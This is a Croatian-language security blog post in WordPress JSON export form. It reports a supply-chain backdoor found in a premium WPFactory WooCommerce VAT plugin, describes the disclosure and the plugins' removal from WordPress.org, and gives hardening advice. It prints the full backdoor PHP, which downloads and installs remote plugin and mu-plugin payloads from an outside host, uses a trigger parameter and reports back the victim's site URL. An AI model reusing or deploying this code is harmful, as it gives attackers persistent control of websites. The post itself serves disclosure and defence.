{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/hr\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Sigurnosni propust na WPFactory: 170.000 WordPress stranica izlo\u017eeno"},"content":{"rendered":"<p>WordPress ostaje najkori\u0161teniji sustav za upravljanje sadr\u017eajem na svijetu, pokre\u0107u\u0107i vi\u0161e od 40 posto svih web stranica na internetu. Od web stranica malih poduze\u0107a i osobnih blogova do velikih korporativnih platformi i e-trgovinskih infrastruktura, CMS je postao okosnica modernog weba. Njegova popularnost proizlazi iz fleksibilnosti, otvorenog ekosustava i golemog broja dostupnih dodataka za pro\u0161irenje njegove funkcionalnosti.<\/p>\n\n\n\n<p>Me\u0111utim, isti ovaj ekosustav postao je i jedan od najve\u0107ih sigurnosnih izazova za WordPress.<\/p>\n\n\n\n<p>U tvrtki Ferber Enterprises na\u0161 tim za kiberneti\u010dku sigurnost neprestano prati prijetnje koje poga\u0111aju WordPress ekosustav jer ranjivosti u dodatcima, temama ili lancima opskrbe mogu se brzo pretvoriti u kompromise velikih razmjera koji poga\u0111aju tisu\u0107e web-stranica diljem svijeta. Posljednjih godina napada\u010di sve \u010de\u0161\u0107e ciljaju developere dodataka i infrastrukturu distribucije umjesto pojedina\u010dnih web-stranica, omogu\u0107uju\u0107i \u0161irenje zlonamjernog koda putem pouzdanih a\u017euriranja softvera i slu\u017ebenih kanala za preuzimanje.<\/p>\n\n\n\n<p>Ovaj tjedan izbio je veliki skandal vezan uz WPFactory, poznatog developera WordPress dodataka \u010diji su proizvodi instalirani na vi\u0161e od 170.000 web-stranica diljem svijeta. Vi\u0161e od 80 dodataka povezanih s tom tvrtkom privremeno je zatvoreno na WordPress.org nakon \u0161to je na\u0161 tim za kiberneti\u010dku sigurnost u Ferber Enterprises otkrio sumnjivu stra\u017enju vrata\u0161ca u premium verziji jednog od njihovih dodataka.<\/p>\n\n\n\n<p>Incident je podigao ozbiljnu zabrinutost diljem WordPress zajednice o sigurnosti opskrbnog lanca softvera, procesima pregleda dodataka i sve ve\u0107oj sofisticiranosti napada usmjerenih na ekosustav otvorenog koda.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Otkri\u0107e sumnjivog pona\u0161anja dodatka<\/h2>\n\n\n\n<p>Problem je prvi put iza\u0161ao na vidjelo nakon \u0161to je na\u0161 tim za kiberneti\u010dku sigurnost u Ferber Enterprises primijetio abnormalno pona\u0161anje tijekom testiranja premium verzije dodatka EU PDV za WooCommerce Pro, distribuiranog izravno s njihove slu\u017ebene web-stranice.<\/p>\n\n\n\n<p>Istra\u017eivanje je u po\u010detku zapo\u010delo nakon \u0161to je dodatak generirao kriti\u010dnu pogre\u0161ku tijekom instalacije. Tijekom rje\u0161avanja problema, na\u0161i analiti\u010dari identificirali su uo\u010dljivu PHP datoteku pod nazivom class-alg-wc-eu-vat-customer.php. Datoteka je pokazivala pona\u0161anje koje je u potpunosti nedosljedno s o\u010dekivanom funkcionalno\u0161\u0107u dodataka za PDV WooCommerce.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Prema na\u0161oj analizi, k\u00f4d je poku\u0161ao:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Preuzmite vanjsku ZIP arhivu s udaljenog poslu\u017eitelja<\/li>\n\n\n\n<li>Izmijenite direktorije WordPressa<\/li>\n\n\n\n<li>Komunicirati s vanjskom infrastrukturom<\/li>\n\n\n\n<li>Potencijalno izvo\u0111enje udaljenih tereta na zahva\u0107enim web stranicama<\/li>\n<\/ul>\n\n\n\n<p>Ovi pokazatelji odmah su sugerirali mogu\u0107u prisutnost skrivenih stra\u017enjih vrata ili zlonamjerne kompromitacije opskrbnog lanca.<\/p>\n\n\n\n<p>Ono \u0161to je situaciju u\u010dinilo osobito alarmantnom bilo je to \u0161to dodatak nije preuzet s neovla\u0161tenog ogledala ili piratskog repozitorija. Paket je preuzet izravno s slu\u017ebenog korisni\u010dkog portala WPFactory-a, \u0161to je poja\u010dalo zabrinutost da je sam kanal distribucije mo\u017eda kompromitiran.<\/p>\n\n\n\n<p>U Ferber Enterprises smo odmah dokumentirali incident i pokrenuli postupak odgovornog otkrivanja kontaktiranjem WPFactory izravno putem Githuba.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">Po\u010detni odgovor od WPFactory<\/h2><\/div>\n\n\n\n<p>WPFactory je u po\u010detku odgovorio navode\u0107i da sumnjiva datoteka i pona\u0161anje opisani u izvje\u0161\u0107u nisu bili dio njihove slu\u017ebene baze koda.<\/p>\n\n\n\n<p>Predstavnik tvrtke predlo\u017eio je nekoliko alternativnih obja\u0161njenja, uklju\u010duju\u0107i:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modificirana lokalna instalacija<\/li>\n\n\n\n<li>Kompromitirano okru\u017eenje web stranice<\/li>\n\n\n\n<li>Zastarela verzija dodatka<\/li>\n\n\n\n<li>Potencijalno kompromitiran izvor preuzimanja<\/li>\n<\/ul>\n\n\n\n<p>Tvrtka je tako\u0111er navela da nisu mogli sigurno pregledati dostavljenu ZIP datoteku jer je njihov preglednik ozna\u010dio arhivu kao potencijalno nesigurnu.<\/p>\n\n\n\n<p>Na\u0161 tim za kiberneti\u010dku sigurnost potom je pojasnio da je dodatak preuzet izravno s slu\u017ebene web-stranice WPFactory-a te da je sumnjiva datoteka ostala prisutna \u010dak i nakon preuzimanja svje\u017ee kopije verzije 4.6.1 s istog izvora.<\/p>\n\n\n\n<p>Ovaj je detalj postao sredi\u0161nji za istragu. Ako je vi\u0161e neovisnih preuzimanja s slu\u017ebenog distribucijskog kanala dosljedno sadr\u017eavalo isti sumnjivi kod, mogu\u0107nost kompromitiranja lokalne web-stranice postajala je sve manje vjerojatna. Unato\u010d tim nalazima, WPFactory je u po\u010detku izjavio da nisu uspjeli reproducirati problem na svojoj strani i tvrdili su da sumnjiva datoteka ne postoji u slu\u017ebenom paketu dodatka.<\/p>\n\n\n\n<p>Tvrtka je zatim zatra\u017eila administratorski i FTP pristup pogo\u0111enom okru\u017eenju kako bi nastavila istragu. U Ferber Enterprises smo odbili taj zahtjev iz razloga kiberneti\u010dke sigurnosti. Pru\u017eanje privilegiranog pristupa poslu\u017eitelju dobavlja\u010du \u010dija je infrastruktura mo\u017eda sama bila kompromitirana predstavljalo bi neprihvatljiv sigurnosni rizik. Na\u0161 je tim umjesto toga nastavio dostavljati tehni\u010dke dokaze, uklju\u010duju\u0107i video demonstraciju koja prikazuje sumnjivo pona\u0161anje dodatka odmah nakon instalacije.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Eskalacija na WordPress.org<\/h2><\/div>\n\n\n\n<p>Kako je istraga napredovala, zabrinutost zbog potencijalnog opsega problema rasla je. WPFactory odr\u017eava veliki portfelj dodataka koji obuhva\u0107a vi\u0161e od 65 dodataka s ukupno vi\u0161e od 170.000 aktivnih instalacija. Svaki kompromis koji bi utjecao na distribucijsku infrastrukturu tvrtke mogao bi stoga imati dalekose\u017ene posljedice po cijeli WordPress ekosustav.<\/p>\n\n\n\n<p>Na\u0161 je tim odmah prijavio problem izravno WordPress.org-u u nastojanju da sprije\u010di dodatne korisnike da instaliraju potencijalno kompromitirane pakete dok je istraga bila u tijeku. WordPress.org je potom poduzeo izvanredan korak i privremeno uklonio vi\u0161e od 80 WPFactory dodataka iz slu\u017ebenog repozitorija.<\/p>\n\n\n\n<p>Ovaj potez odmah je privukao pozornost cijele WordPress zajednice za sigurnost jer su masovna zatvaranja dodataka takvih razmjera relativno rijetka i obi\u010dno ukazuju na ozbiljne nerije\u0161ene probleme. Nakon eskalacije, WPFactory je kasnije priznao da je problem bio legitiman i ispri\u010dao se \u0161to nije br\u017ee reagirao na po\u010detno izvje\u0161\u0107e. Predstavnici tvrtke izjavili su da aktivno istra\u017euju slu\u010daj i rade na rje\u0161enju. Jedna je hipoteza koju je interno iznijela tvrtka WPFactory sugerirala da je zastarjeli ili ke\u0161irani paket dodatka mo\u017eda nenamjerno poslu\u017een putem njihove infrastrukture.<\/p>\n\n\n\n<p>Me\u0111utim, na\u0161 tim za kiberneti\u010dku sigurnost nije se slo\u017eio s tom procjenom. Promatrano pona\u0161anje sna\u017eno je ukazivalo na dublji sigurnosni problem koji bi potencijalno mogao uklju\u010divati ugro\u017eene build pipelineove, distribucijske sustave ili neovla\u0161teno ubacivanje koda u arhive koje se mogu preuzeti.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Za\u0161to je ovaj incident va\u017ean<\/h2>\n\n\n\n<p>Kontroverza WPFactory isti\u010de rastu\u0107u kiberneti\u010dku prijetnju poznatu kao napad na lanac opskrbe softverom. Tradicionalno su napada\u010di ciljali na kompromitiranje pojedina\u010dnih web-stranica izravno putem brute-force napada ili ranjivosti dodataka. Danas prijetitelji sve vi\u0161e ciljaju same dobavlja\u010de softvera jer kompromitiranje pouzdanog dobavlja\u010da omogu\u0107uje \u0161irenje zlonamjernog koda na tisu\u0107e web-stranica istovremeno.<\/p>\n\n\n\n<p>Ova je strategija ve\u0107 primije\u0107ena u nekoliko visokoprofilnih kiberneti\u010dkih incidenata koji su utjecali na globalne softverske ekosustave tijekom proteklog desetlje\u0107a. Konkretno u WordPress ekosustavu, razvojni programeri dodataka predstavljaju atraktivne mete jer administratori dodacima inherentno vjeruju i oni \u010desto rade s povi\u0161enim dopu\u0161tenjima.<\/p>\n\n\n\n<p>Ako se zlonamjerni kod uvede u paket dodatka distribuiran slu\u017ebenim kanalom, pogo\u0111ene web-stranice mogu nehotice instalirati zlonamjerni softver. U slu\u010daju sumnjivog dodatka WPFactory, mogu\u0107e posljedice su ozbiljne.<\/p>\n\n\n\n<p>Na temelju na\u0161e analize, identificirano pona\u0161anje teoretski bi moglo omogu\u0107iti napada\u010dima da:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Dodaj dodatni zlonamjerni softver<\/li>\n\n\n\n<li>Ubaci SEO spam<\/li>\n\n\n\n<li>Napravite trajne zlouporabe<\/li>\n\n\n\n<li>Izvu\u0107i osjetljive podatke<\/li>\n\n\n\n<li>Daljinsko ure\u0111ivanje WordPress instalacija<\/li>\n\n\n\n<li>Odr\u017eavati neovla\u0161teni pristup tijekom duljih razdoblja<\/li>\n<\/ul>\n\n\n\n<p>Opasnost ovakvih napada le\u017ei u njihovoj prikrivenosti. Moderni skriveni ulazi \u010desto su dizajnirani da ostanu neaktivni mjesecima prije aktivacije, \u0161to zna\u010dajno ote\u017eava njihovo otkrivanje. Po\u010detkom ovog mjeseca, WordPress Plugins Team navodno je zatvorio vi\u0161e od 30 dodataka nakon \u0161to je skriveni zlonamjerni kod ugra\u0111en u portfelj drugog dodatka ostao neaktivan otprilike osam mjeseci prije nego \u0161to se napokon aktivirao i ubrizgao SEO spam na web stranice.<\/p>\n\n\n\n<p>Ovaj trend pokazuje kako napada\u010di sve vi\u0161e prioritetiziraju postojanost i odgo\u0111eno aktiviranje kako bi izbjegli mehanizme za otkrivanje.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">\u0160ira sigurnosna kriza u WordPress ekosustavu<\/h2><\/div>\n\n\n\n<p>Incident WPFactory tako\u0111er razotkriva \u0161ire sustavne sigurnosne izazove koji poga\u0111aju WordPress u cjelini. Ekosustav dodataka dramati\u010dno se pro\u0161irio tijekom proteklog desetlje\u0107a, s desecima tisu\u0107a dodataka dostupnih na slu\u017ebenim i komercijalnim tr\u017ei\u0161tima. Iako taj ekosustav poti\u010de inovacije i fleksibilnost, on tako\u0111er stvara ogromnu slo\u017eenost za sigurnosni nadzor.<\/p>\n\n\n\n<p>Prema izvje\u0161\u0107u Patchstakka &quot;Stanje sigurnosti WordPressa u 2026. godini&quot;, gotovo 46% poznatih ranjivosti nije zakrpljeno prije javnog objavljivanja. Ova statistika odra\u017eava sve ve\u0107i teret koji le\u017ei na programerima dodataka, istra\u017eiva\u010dima sigurnosti i upraviteljima repozitorija.<\/p>\n\n\n\n<p>Istodobno, slu\u017ebeni red \u010dekanja za pregled dodataka za WordPress navodno sada prema\u0161uje 4.000 dodataka koji \u010dekaju na pregled. Takvi brojevi ilustriraju golem izazov odr\u017eavanja osiguranja kvalitete i sigurnosnog audita u velikim razmjerima.<\/p>\n\n\n\n<p>Mnogi programeri dodataka su mali timovi s ograni\u010denim sigurnosnim resursima. Drugi istovremeno upravljaju desecima dodataka dok provode agresivne komercijalne strategije rasta koje uklju\u010duju akvizicije i \u0161irenje portfelja. WPFactory je nedavno pro\u0161irio svoje poslovanje putem akvizicija, uklju\u010duju\u0107i kupnju Extend-WP-a i njegovih 19 dodataka 2025. godine, nakon \u010dega je uslijedila akvizicija WBW-a i jo\u0161 nekoliko dodataka kasnije te godine.<\/p>\n\n\n\n<p>Brzo \u0161irenje portfelja mo\u017ee stvoriti operativnu slo\u017eenost koja komplicira reviziju koda, upravljanje infrastrukturom i provjeru integriteta izdanja. Napada\u010di su dobro svjesni tih stvarnosti. Sve se vi\u0161e usredoto\u010duju na iskori\u0161tavanje slabih praksi operativne sigurnosti unutar dobavlja\u010da softvera umjesto izravnog ciljanja krajnjih korisnika.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Rastu\u0107a va\u017enost sigurnosti opskrbnog lanca<\/h2>\n\n\n\n<p>Incidenti poput ovoga nagla\u0161avaju hitnu potrebu za sna\u017enijim praksama sigurnosti opskrbnog lanca u cijelom WordPress ekosustavu.<\/p>\n\n\n\n<p>U tvrtki Ferber Enterprises na\u0161 tim za kiberneti\u010dku sigurnost sna\u017eno preporu\u010duje da programeri dodataka usvoje nekoliko klju\u010dnih za\u0161tita, uklju\u010duju\u0107i:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kriptografsko potpisivanje paketa<\/li>\n\n\n\n<li>Sigurne CI\/CD linije<\/li>\n\n\n\n<li>Obavezna vi\u0161efaktorska autentifikacija<\/li>\n\n\n\n<li>Segmentacija infrastrukture<\/li>\n\n\n\n<li>Kontinuirano pra\u0107enje integriteta<\/li>\n\n\n\n<li>Nezavisne revizije koda<\/li>\n\n\n\n<li>Sustavi za ponovljivo gra\u0111enje<\/li>\n<\/ul>\n\n\n\n<p>Administratori web stranica tako\u0111er bi trebali oja\u010dati vlastitu sigurnost. \u010cak se i dodaci preuzeti s slu\u017ebenih ili pouzdanih izvora ne smiju automatski smatrati sigurnima.<\/p>\n\n\n\n<p>Organizacije koje upravljaju kriti\u010dnom WordPress infrastrukturom trebale bi razmotriti:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Odr\u017eavanje staging okru\u017eenja<\/li>\n\n\n\n<li>Pra\u0107enje odlaznog prometa<\/li>\n\n\n\n<li>Skeniranje dodataka prije implementacije<\/li>\n\n\n\n<li>Ograni\u010davanje kori\u0161tenja dodataka<\/li>\n\n\n\n<li>Primjena kontrole pristupa najmanjih povlastica<\/li>\n\n\n\n<li>Implementacija nadzora integriteta datoteka<\/li>\n\n\n\n<li>Kori\u0161tenje upravljanih vatrozida za web-aplikacije (WAF)<\/li>\n<\/ul>\n\n\n\n<p>U poduze\u0107ima, provjera lanca opskrbe postaje jednako va\u017ena kao i tradicionalno upravljanje ranjivostima. Pretpostavka da su slu\u017ebeni softverski kanali uvijek sigurni vi\u0161e nije realna u dana\u0161njem krajoliku prijetnji.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reakcije zajednice i istraga koja je u tijeku<\/h2>\n\n\n\n<p>Kontroverza se brzo pro\u0161irila WordPress zajednicom nakon \u0161to su programeri, sigurnosni istra\u017eiva\u010di i pru\u017eatelji usluga infrastrukture javno po\u010deli raspravljati o tom pitanju.<\/p>\n\n\n\n<p>Nekoliko poznatih osoba unutar ekosustava pove\u0107alo je svijest o situaciji, uklju\u010duju\u0107i razvojne programere koji su objavili popise privremeno zatvorenih dodataka i potaknuli administratore da revidiraju svoja okru\u017eenja.<\/p>\n\n\n\n<p>U me\u0111uvremenu na\u0161 tim u Ferber Enterprises nastavlja analizirati sumnjive uzorke dodataka i pratiti dodatne pokazatelje kompromitiranja koji bi mogli utjecati na WordPress web-stranice diljem svijeta.<\/p>\n\n\n\n<p>U trenutku objave, WPFactory je priznao problem i izjavio da aktivno radi na rje\u0161enju.<\/p>\n\n\n\n<p>Me\u0111utim, mnoga pitanja ostaju neodgovorena:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Je li slu\u017ebena distribucijska infrastruktura kompromitirana?<\/li>\n\n\n\n<li>Koliko su dugo zlonamjerni paketi potencijalno distribuirani?<\/li>\n\n\n\n<li>Jesu li bili pogo\u0111eni dodatni dodaci?<\/li>\n\n\n\n<li>Jesu li korisni\u010dki ra\u010duni ili sustavi za preuzimanje ugro\u017eeni?<\/li>\n\n\n\n<li>Jesu li napada\u010di stekli trajni pristup unutarnjoj infrastrukturi?<\/li>\n\n\n\n<li>Mogu li postojati jo\u0161 uspavani tereti?<\/li>\n<\/ul>\n\n\n\n<p>Dok se ova pitanja u potpunosti ne rije\u0161e, oprez ostaje klju\u010dan.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Budu\u0107nost WordPress sigurnosti<\/h2>\n\n\n\n<p>Incident WPFactory mogao bi na kraju postati jo\u0161 jedan klju\u010dan primjer izazova kiberneti\u010dke sigurnosti s kojima se suo\u010dava web ekosustav otvorenog koda.<\/p>\n\n\n\n<p>WordPress pokre\u0107e ogroman dio globalne internetske ekonomije. Svaki veliki kompromitiraju\u0107i doga\u0111aj koji utje\u010de na razvojne programere dodataka stoga mo\u017ee imati posljedice koje nadilaze pojedina\u010dne web stranice.<\/p>\n\n\n\n<p>Kako napada\u010di nastavljaju evoluirati prema kompromitiranju lanaca opskrbe i tehnikama prikrivenog trajnog prisustva, sigurnost dodataka vi\u0161e se ne mo\u017ee smatrati sporednom brigu. U Ferber Enterprises vjerujemo da ovaj doga\u0111aj slu\u017ei kao klju\u010dni podsjetnik da kiberneti\u010dka sigurnost nije samo za\u0161tita samih web-stranica, nego i osiguravanje svakog sloja lanca distribucije softvera.<\/p>\n\n\n\n<p>Povjerenje u otvorene ekosustave ovisi o transparentnosti, brzoj reakciji na incidente i sna\u017enim praksama operativne sigurnosti. WordPress ekosustav sada se suo\u010dava s va\u017enim trenutkom.<\/p>\n\n\n\n<p>Kako \u0107e programeri, odr\u017eavatelji spremi\u0161ta, pru\u017eatelji hostinga i sigurnosni timovi odgovoriti na ovakve incidente, pomo\u0107i \u0107e u odre\u0111ivanju ho\u0107e li WordPress mo\u0107i nastaviti zadr\u017eati povjerenje milijuna tvrtki i organizacija koje se svakodnevno oslanjaju na njega.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-positi